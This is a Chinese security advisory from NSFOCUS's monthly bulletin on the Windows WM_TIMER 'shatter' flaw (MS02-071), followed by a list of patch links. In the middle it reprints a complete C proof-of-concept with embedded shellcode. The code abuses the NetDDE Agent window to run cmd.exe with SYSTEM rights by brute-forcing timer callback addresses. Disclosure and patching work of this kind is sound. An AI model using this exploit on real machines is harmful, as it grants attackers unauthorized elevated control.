首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第38期->最新漏洞
日期:2003-01-03
发布日期:2002-12-11
更新日期:2002-12-16
受影响系统:
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 5927
CVE(CAN) ID: CAN-2002-1230
Windows消息提供对用户事件的交互处理(如击键或鼠标移动)和与其他交互进程通信。WM_TIMER消息一般在某一计时器超时时发送,可以用来使进程执行计时回调函数。
WM_TIMER消息存在安全问题,本地或者利用终端服务访问攻击者可以利用这个漏洞使用WM_TIMER消息利用其他高权限进程执行回调函数,造成权限提升。
WM_TIMER的安全漏洞可以导致在交互桌面上的某一进程使用WM_TIME消息,触发另一进程在它选择的地址上执行回调函数,而且即使第二个进程没有设置任何计时器。如果第二个进程的权限高于第一个,使得回调函数可能以高权限执行。
默认情况下,运行在交互桌面的几个进程一般都以LocalSystem权限运行,结果使攻击者以交互方式登录系统的情况下,可以运行程序征集使用WM_TIMER请求的进程,利用漏洞以高权限执行任意攻击者指定的操作。
另外,这个漏洞补丁也对几个运行在交互桌面上的以高权限运行的进程进行修正,虽然这些进程不存在WM_TIMER漏洞,微软还是把这些进程包含在补丁中使服务更强壮。
<*来源:Serus (serus@users.mns.ru)
链接:http://security.tombom.co.uk/shatter.html
http://www.microsoft.com/technet/security/bulletin/MS02-071.asp
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Serus(serus@users.mns.ru) 提供了如下测试程序:
//
/////////// Copyright Serus 2002////////////////
//mailto:serus@users.mns.ru
//
//This program check system on winlogon bug present
//Only for Windows 2000
//This is for check use only!
//
#include <windows.h>
#include <stdio.h>
void main(int argc, char *argv[ ], char *envp[ ] )
{
char *buf;
DWORD Addr = 0;
BOOL bExec = TRUE;
unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function,
// executes cmd.exe on user`s desktop and creates mutex.
0x8B, 0xF4,
0x68, 0x53, 0x45, 0x52, 0x00,
0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,
0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,
0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00,
0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,
0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69,
0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,
0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,
0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08,
0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4,
0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3
};
HWND hWnd;
COPYDATASTRUCT cds;
HMODULE hMod;
DWORD ProcAddr;
HANDLE hMutex;
char mutname[4];
printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ====");
// Get NetDDE Window
hWnd = FindWindow("NDDEAgnt","NetDDE Agent");
if(hWnd == NULL)
{
MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);
return;
}
// Get CreateProcessA and CreateMutexA entry addresses
hMod = GetModuleHandle("kernel32.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");
if(ProcAddr == 0)
{
MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
return;
}
*(DWORD *)(sc + 86 + 21) = ProcAddr;
ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");
if(ProcAddr == 0)
{
MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
return;
}
*(DWORD *)(sc + 15) = ProcAddr;
//Generate random Mutex name
srand(GetTickCount());
do
{
mutname[0] = 97 + rand()%25;
mutname[1] = 65 + rand()%25;
mutname[2] = 65 + rand()%25;
mutname[3] = 0;
}
while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);
memcpy(sc + 3, mutname, 4);
//Form buffer for SendMessage
buf = (char *)malloc(1000);
memset(buf, 0xC3, 1000);
memcpy(buf, sc, sizeof(sc));
cds.cbData = 1000;
cds.dwData = 0;
cds.lpData=(PVOID)buf;
//If first login
//Send shellcode buffer
SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
//Try execute it at 0x0080FA78
PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78);
printf("\n\nTrying at 0x%X", 0x0080FA78);
//If fails (perhaps not first login)
//Try to bruteforce shellcode addresss
for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)
{
//If mutex exists, shellcode has been executed
if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
{
//Success
printf("\nSuccess!!!\n");
printf("\nWarning! You system has vulnerability!\n");
CloseHandle(hMutex);
return;
}
printf("\rTrying at 0x%X", Addr);
SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);
}
//Bug in winlogon not presents
printf("\n\nBad luck! Reboot and try again.\n\n");
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS02-071)以及相应补丁:
MS02-071:Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation (328310)
链接:http://www.microsoft.com/technet/security/bulletin/MS02-071.asp
补丁下载:
Microsoft Windows 2000 Professional SP3:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server SP3:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server SP3:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services SP3:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Datacenter Server SP3:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services SP2:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server SP2:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Datacenter Server SP2:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Professional SP2:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server SP2:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server SP1:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Professional SP1:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server SP1:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Datacenter Server SP1:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services SP1:
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows XP Home SP1:
Microsoft Patch Q328310_WXP_SP2_x86_ENU.exe
http://microsoft.com/downloads/details.aspx?FamilyId=98F02C55-E598-4EB1-AABE-DB3BA0807685&displaylang=en
Microsoft Windows XP Professional SP1:
Microsoft Patch Q328310_WXP_SP2_x86_ENU.exe
http://microsoft.com/downloads/details.aspx?FamilyId=98F02C55-E598-4EB1-AABE-DB3BA0807685&displaylang=en
Microsoft Windows 2000 Server :
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server :
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Professional :
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services :
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server Japanese Edition :
Microsoft Patch Q328310_W2K_SP4_nec98_JA.exe
http://microsoft.com/downloads/details.aspx?FamilyId=68601571-CF9C-4BD0-B285-26C0A3DF6FCA&displaylang=ja
Microsoft Windows XP Professional :
Microsoft Windows XP Home :
Microsoft Windows 2000 Datacenter Server :
Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
版权所有,未经许可,不得转载